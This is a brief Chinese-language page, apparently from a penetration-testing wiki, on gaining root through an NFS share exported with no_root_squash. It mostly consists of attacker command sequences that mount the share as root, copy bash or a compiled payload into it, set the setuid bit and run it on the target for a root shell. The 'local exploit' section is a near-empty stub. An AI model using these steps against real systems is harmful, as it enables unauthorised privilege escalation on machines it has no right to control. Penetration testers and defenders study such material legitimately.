NFS no_root_squash/no_all_squash 错误配置
远程利用
# Attacker, as root user mkdir /tmp/pe mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe cd /tmp/pe cp /bin/bash . chmod +s bash # 目标机器 cd <SHAREDD_FOLDER> ./bash -p #ROOT shell# Attacker, as root user gcc payload.c -o payload mkdir /tmp/pe mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe cd /tmp/pe cp /tmp/payload . chmod +s payload # 目标机器 cd <SHAREDD_FOLDER> ./payload #ROOT shell
本地漏洞利用
NFSEHLL
最后更新于